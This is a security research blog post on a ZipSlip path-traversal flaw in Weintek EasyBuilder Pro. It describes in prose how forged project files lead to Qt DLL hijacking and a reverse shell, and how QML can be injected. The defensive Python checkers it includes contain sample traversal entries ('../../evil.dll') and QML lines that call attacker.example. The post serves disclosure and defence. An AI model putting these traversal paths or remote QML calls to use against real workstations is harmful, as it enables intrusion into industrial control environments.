In this blog post, we will delve into the underlying causes of the vulnerabilities discovered in Weintek’s applications by our researchers from TXOne PSIRT and Threat Research Team. We will also provide a mitigation strategy to address the issue. For further information, please refer to the CISA Advisory publication: https://www.cisa.gov/uscert/ics/advisories/icsa-23-045-01
Weintek Ecosystem Overview
To gain a comprehensive understanding of the potential impact of the vulnerability, we conducted an analysis of the ecosystem surrounding Weintek’s product. The results of this analysis are presented below.
Figure 1. Weintek Ecosystem Overview
Vulnerability Root Cause Analysis
The exploitation scenario discussed in this blog is based on EasyBuilder Pro V6.07.02.273 Build 2022.07.26. In this version, we discovered a ZipSlip vulnerability that enables an attacker to drop files to an arbitrary location on the engineering workstation by using a forged project file.
Figure 2. Overview of EasyBuilder Pro
1. Project Decompiling
The project file extension used in EasyBuilder Pro is “.cxob”, which is actually a gzip-compressed tar archive (“.tar.gz”). During the decompiling process, once the project file is loaded into EasyBuilder Pro, it decompresses the “.cxob” file and converts it to the “.cmtp” format. EasyBuilder Pro then opens the decompressed project file in the “.cmtp” format.
Figure 3. Decompiling the Project File
Figure 4. Opening the Decompiled Project File
Figure 5. HMI GUI in the Project File
2. ZipSlip Vulnerability in bsdtar.exe
In EasyBuilder Pro, bsdtar.exe is used to decompile the project file. However, the bundled copy is an outdated version that is affected by a known path traversal weakness.
Figure 6. The bsdtar.exe Version 2.4.12.3100 is Vulnerable
The outdated version of bsdtar.exe is affected by the ZipSlip vulnerability: during decompression it honors absolute paths and parent-relative (“../”) paths stored in archive entries instead of confining them to the extraction directory. As a result, an attacker can drop a malicious file to any desired location, rather than being restricted to the current directory.
Figure 7. The Attacker can Assign the Absolute Path in the Project file
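The following is an added defender-side example, not code from the original post or from Weintek, showing the check that a safe extractor applies and that the vulnerable bsdtar.exe omits: every member of the “.cxob” archive (a gzip-compressed tar) is resolved against the intended extraction directory before anything is written, and absolute paths (including Windows drive-letter paths), “../” traversal, and symlink or hardlink targets that point outside the directory are reported. The sample archive and its member names are constructed for illustration and are not a real project file.

```python
import io
import os
import re
import tarfile

# Windows drive-letter prefix such as "C:/" (backslashes are normalised to "/" first).
WIN_DRIVE = re.compile(r"^[A-Za-z]:/")


def escapes(dest: str, relname: str) -> bool:
    """True if relname, interpreted the way an extractor would, lands outside dest."""
    name = relname.replace("\\", "/")
    if name.startswith("/") or WIN_DRIVE.match(name):
        return True  # absolute path: a vulnerable extractor writes exactly there
    target = os.path.normpath(os.path.join(dest, name))  # collapses "../" segments
    return os.path.commonpath([dest, target]) != dest


def unsafe_members(tar: tarfile.TarFile, dest: str) -> list:
    """Names of members whose path, symlink target or hardlink target escapes dest."""
    dest = os.path.normpath(os.path.abspath(dest))
    flagged = []
    for member in tar.getmembers():
        if escapes(dest, member.name):
            flagged.append(member.name)
            continue
        if member.issym():
            # A symlink target is resolved relative to the link's own directory.
            link = os.path.join(os.path.dirname(member.name.replace("\\", "/")), member.linkname)
            if escapes(dest, link):
                flagged.append(member.name)
        elif member.islnk() and escapes(dest, member.linkname):
            # A hardlink target is relative to the archive root.
            flagged.append(member.name)
    return flagged


def audit_archive(data: bytes, dest: str) -> list:
    """Return the offending member names of an in-memory .tar.gz without extracting it."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        return unsafe_members(tar, dest)


def safe_extract(data: bytes, dest: str) -> None:
    """Extract only if every member stays under dest; refuse the whole archive otherwise."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        bad = unsafe_members(tar, dest)
        if bad:
            raise ValueError("archive contains path traversal entries: " + ", ".join(bad))
        tar.extractall(dest)


def build_sample_archive() -> bytes:
    """Constructed sample (not a real .cxob): one benign member plus three escape attempts."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        def add_file(name: str, payload: bytes) -> None:
            info = tarfile.TarInfo(name=name)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))

        add_file("project/main.cmtp", b"<project/>")      # benign, stays inside dest
        add_file("C:\\ProgramData\\evil.dll", b"MZ")       # absolute Windows path
        add_file("../../evil.dll", b"MZ")                  # parent-relative traversal
        link = tarfile.TarInfo(name="project/link")        # symlink whose target escapes
        link.type = tarfile.SYMTYPE
        link.linkname = "../../outside"
        tar.addfile(link)
    return buf.getvalue()


if __name__ == "__main__":
    print(audit_archive(build_sample_archive(), "/tmp/extracted-project"))
```

Recent Python releases offer `tarfile.extractall(path, filter="data")`, which applies comparable rules; the explicit version above makes the decision visible and lets an operator quarantine a project file whose listing contains any flagged entry instead of discovering the write after the fact.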
In most cases, the source of the project file may be from the Network, USB, or HMI (as depicted in Figure 8). If you are not fully confident in the trustworthiness of the source, it is highly recommended that you exercise caution and avoid decompiling project files using unpatched EasyBuilder Pro or any SCADA software.
Figure 8. The Project File Might be Sent From a Network, USB, or HMI
Exploitation
In an effort to raise awareness of the dangers posed by untrusted project files, we demonstrated an exploitation PoC of this vulnerability. The primitive we start from is a write to an arbitrary path with fully controllable content. The challenge is to turn this primitive into remote code execution (RCE).
The target that immediately comes to mind is Qt, given that EasyBuilder Pro is heavily reliant on Qt. During the decompression and rendering of the project file (.cxob), a multitude of Qt components are dynamically loaded based on the HMI GUI design specified in the project file.
Figure 9. EasyBuilder Pro Imports QML Files During Rendering of the Project
Figure 10. EasyBuilder Pro Imports a Qt Plugin DLL While Rendering the Project
Our objective is to obtain a reverse shell without disrupting the daily operations of the EWS. This requires ensuring that all systems and processes continue to function normally.
1. Qt Plugin DLL Hijacking
Qt is designed to load external modules as plugins. Based on the information presented in ZDI’s blog, we understand that hijacking a Qt plugin can be accomplished by satisfying the following two conditions:
1) The Qt plugin must contain a section named “.qtmetad” holding plugin metadata in the proper format.
2) The Qt plugin must export a function named “qt_plugin_instance” (this is what Qt resolves in most cases).
Figure 11. The Malicious windowplugin.dll
After conducting some experimentation, we were able to successfully create a malicious DLL and incorporate it into the project file. When EasyBuilder Pro loads this malicious project file, the attacker (in this case, us) will obtain initial access to the system.
1. The pop-up message box shows that DllMain in the malicious DLL was executed when EasyBuilder Pro loaded it.
Figure 12. The Hijacked DLL is Summoned Successfully
2. The malicious DLL then creates a new thread for the reverse shell.
Figure 13. The Reverse Shell in the Hijacked DLL is Triggered
3. By comparing the Ethernet adapter settings and the username, we can see that the reverse shell is spawned from the victim’s machine.
Figure 14. Verifying the Reverse Shell is From the Same Machine
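From the defender’s side, the two conditions above also give a cheap way to spot a planted plugin: a DLL that carries the Qt metadata section but is not part of the vendor-shipped set deserves attention. The following is an added example, not code from the post or from Weintek or Qt. It parses the PE section table directly (no third-party module), treats any image with a “.qtmetad” section as a Qt plugin, inventories such files under a directory with their SHA-256, and reports the ones that are new or changed relative to a baseline manifest. The sample PE image is constructed inline and consists of headers only; the manifest paths used in the test are assumed.

```python
import hashlib
import os
import struct

QT_METADATA_SECTION = ".qtmetad"   # section Qt 5 uses to embed plugin metadata


def pe_section_names(data: bytes) -> list:
    """Section names from a PE image's section table; [] if data is not a PE file."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return []
    coff = e_lfanew + 4                                      # IMAGE_FILE_HEADER
    (num_sections,) = struct.unpack_from("<H", data, coff + 2)
    (opt_header_size,) = struct.unpack_from("<H", data, coff + 16)
    table = coff + 20 + opt_header_size                      # first IMAGE_SECTION_HEADER
    names = []
    for i in range(num_sections):
        raw = data[table + i * 40: table + i * 40 + 8]       # 8-byte, NUL-padded Name field
        if len(raw) < 8:
            break                                            # truncated table: stop here
        names.append(raw.split(b"\0", 1)[0].decode("ascii", "replace"))
    return names


def is_qt_plugin(data: bytes) -> bool:
    return QT_METADATA_SECTION in pe_section_names(data)


def inventory_qt_plugins(root: str) -> dict:
    """Map relative path -> SHA-256 for every file under root that looks like a Qt plugin."""
    found = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            with open(path, "rb") as fh:
                data = fh.read()
            if is_qt_plugin(data):
                found[os.path.relpath(path, root)] = hashlib.sha256(data).hexdigest()
    return found


def unexpected_plugins(baseline: dict, current: dict) -> list:
    """Plugins absent from the vendor baseline or whose hash differs from it."""
    return sorted(p for p, digest in current.items() if baseline.get(p) != digest)


def build_sample_pe(section_names) -> bytes:
    """Constructed header-only PE image (not a loadable DLL) with the given section names."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew: PE header follows the DOS header
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
    # SizeOfOptionalHeader (0: none in this sample), Characteristics (EXECUTABLE | DLL)
    coff = struct.pack("<HHIIIHH", 0x8664, len(section_names), 0, 0, 0, 0, 0x2022)
    sections = b"".join(n.encode("ascii").ljust(8, b"\0") + bytes(32) for n in section_names)
    return bytes(dos) + b"PE\0\0" + coff + sections


if __name__ == "__main__":
    planted = build_sample_pe([".text", ".rdata", QT_METADATA_SECTION])
    print(pe_section_names(planted), is_qt_plugin(planted))
```

Running `inventory_qt_plugins` once on a clean installation and storing the result gives the baseline; running it again on the installation folder, or on the directory a project file was extracted into, and passing both to `unexpected_plugins` lists exactly the DLLs that would be candidates for the hijack shown in Figures 11 to 14.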
2. QML Injection
Furthermore, we identified another possible method of attack in the form of QML injection.
The most interesting aspect of QML is that it gives developers the ability to write and execute JavaScript code, or to include resources from a network (as demonstrated in Figures 15 and 16). The “Image” element, for instance, allows its source to be loaded over the network.
While we have only prepared a simple proof of concept for this attack vector, full remote code execution remains a viable possibility. It is important to be aware of the potential danger posed by this convenient attack vector.
Figure 15. The Malicious QML can Import Images through HTTP
Figure 16. HTTP Request From the Victim’s Machine
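Because QML in a project file is data that the workstation will interpret, a reviewer can scan it for network references before the project is opened. The following is an added example, not code from the post or from Weintek: it flags remote module imports, remote “source” properties such as the Image case above, “Qt.include” of a remote script, use of XMLHttpRequest, and any other HTTP/FTP URL literal, reporting the line number and the kind of finding. The pattern list and the sample QML are constructed for illustration; the host name in it is a reserved example domain.

```python
import re

# A quoted http(s)/ftp URL literal.
URL = "[\"'](?:https?|ftp)://[^\"']+[\"']"

# Ordered from most to least specific; the first match decides the finding kind.
# This list is an assumption for illustration and is not exhaustive.
PATTERNS = [
    ("remote-import", re.compile(r"^\s*import\s+" + URL)),      # import "http://host/Module"
    ("remote-source", re.compile(r"\bsource\s*:\s*" + URL)),    # Image/Loader { source: "http://..." }
    ("remote-include", re.compile(r"Qt\.include\(\s*" + URL)),  # Qt.include("http://...")
    ("xhr", re.compile(r"\bXMLHttpRequest\b")),                  # JavaScript network requests
    ("url-literal", re.compile(URL)),                            # any other remote URL
]


def scan_qml(text: str) -> list:
    """Return (line number, finding kind, stripped line) for every line that matches."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS:
            if pattern.search(line):
                findings.append((lineno, kind, line.strip()))
                break
    return findings


# Constructed sample QML: a local resource (line 5) must not be reported.
SAMPLE_QML = """\
import QtQuick 2.12
import "http://attacker.example/Module" as Remote
Rectangle {
    Image { source: "http://attacker.example/beacon.png" }
    Image { source: "qrc:/images/logo.png" }
    Component.onCompleted: {
        var xhr = new XMLHttpRequest()
        xhr.open("GET", "http://attacker.example/collect")
    }
}
"""

if __name__ == "__main__":
    for finding in scan_qml(SAMPLE_QML):
        print(finding)
```

A project whose QML produces any finding other than references to resources bundled in the archive itself should be treated as untrusted, since a single remote source line is enough to produce the outbound request shown in Figure 16.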
Prevent Exploitation with TXOne Goalkeeper
1. Use StellarProtect’s Application Lockdown to prevent the malicious process from spawning from the compromised process by DLL side-loading.
Figure 17. The System Event Log Shows StellarProtect’s Application Lockdown Blocking the Malicious Process
Figure 18. The Console Shows That StellarProtect’s Application Lockdown Blocked the Malicious Process Successfully
2. Use StellarProtect’s OT Safeguard to prevent the overwriting of files in the ICS software installation folder.
Figure 19. In the System Event Log, StellarProtect’s OT Safeguard Successfully Blocked the Overwriting of the File
Figure 20. In the Console, StellarProtect’s OT Safeguard Successfully Blocked the Overwriting of the File
Timelines
References
[1] ZDI, “Loading Up a Pair of Qt Bugs: Detailing CVE-2019-1636 and CVE-2019-6739”, Zero Day Initiative, accessed Feb 6, 2023
[2] Weincloud, “OPC UA Server”, Weintek, accessed Feb 6, 2023